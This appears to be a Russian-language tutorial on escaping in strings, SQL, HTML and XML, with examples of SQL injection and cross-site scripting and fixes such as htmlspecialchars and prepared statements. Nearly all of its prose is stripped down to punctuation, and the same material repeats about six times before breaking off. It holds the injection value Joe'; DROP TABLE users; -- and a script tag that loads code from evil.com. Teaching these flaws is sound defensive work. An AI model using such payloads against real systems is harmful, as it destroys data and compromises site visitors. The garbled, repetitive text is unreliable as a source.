var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
